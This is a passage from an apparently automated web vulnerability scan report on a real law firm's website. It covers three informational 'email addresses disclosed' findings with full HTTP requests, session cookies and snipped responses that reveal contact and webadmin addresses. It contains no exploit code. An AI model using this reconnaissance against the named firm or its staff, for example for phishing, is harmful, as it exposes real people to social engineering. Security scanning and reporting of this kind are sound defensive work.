User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.4.10.1302880562; lang=en-GB

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29100
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: fdf36839a0ad483e8172e42cf7105e9d
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:33:52 GMT; path=/
Date: Fri, 15 Apr 2011 15:33:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Publication
...[SNIP]...

3. Email addresses disclosed  previous
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


3.1. http://www.dac.co.uk/contact/london  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /contact/london

Issue detail

The following email address was disclosed in the response:

Request

GET /contact/london HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.1.10.1302880562; lang=en-GB

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10102
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 6432dc5b9bb742b7924cb5a05fc15cb1
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:31:12 GMT; path=/
Date: Fri, 15 Apr 2011 15:31:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>London Lawy
...[SNIP]...
<a href="mailto:daclon@dac.co.uk">daclon@dac.co.uk</a>
...[SNIP]...
<a href="mailto:daclon@dac.co.uk">daclon@dac.co.uk</a>
...[SNIP]...

3.2. http://www.dac.co.uk/documents/js/jquery.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /documents/js/jquery.js

Issue detail

The following email address was disclosed in the response:

Request

GET /documents/js/jquery.js HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en-GB; ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 77538
Content-Type: application/x-javascript
Expires: Fri, 15 Apr 2011 15:13:11 GMT
ETag: 8fc0bbf99a6c4564886ffdaafeed5e70
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 5a4f5b5f91d04c598de1c72015826e61
EON-Expires: 60
EON-ResourceIdentifier: 5a4f5b5f91d04c598de1c72015826e61
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:00 GMT; path=/
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:01 GMT; path=/
Date: Fri, 15 Apr 2011 15:13:00 GMT

/*
* jQuery JavaScript Library v1.3.1
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-01-
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

3.3. http://www.dac.co.uk/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.1.10.1302880562; lang=en-GB

Response

HTTP/1.1 404 Not Found
Content-Length: 6170
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Fri, 15 Apr 2011 15:13:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Davies Arnold
...[SNIP]...
<a href="mailto:webadmin@dac.co.uk">webadmin@dac.co.uk</a>
...[SNIP]...

Report generated by XSS.CX at Fri Apr 15 14:09:40 CDT 2011.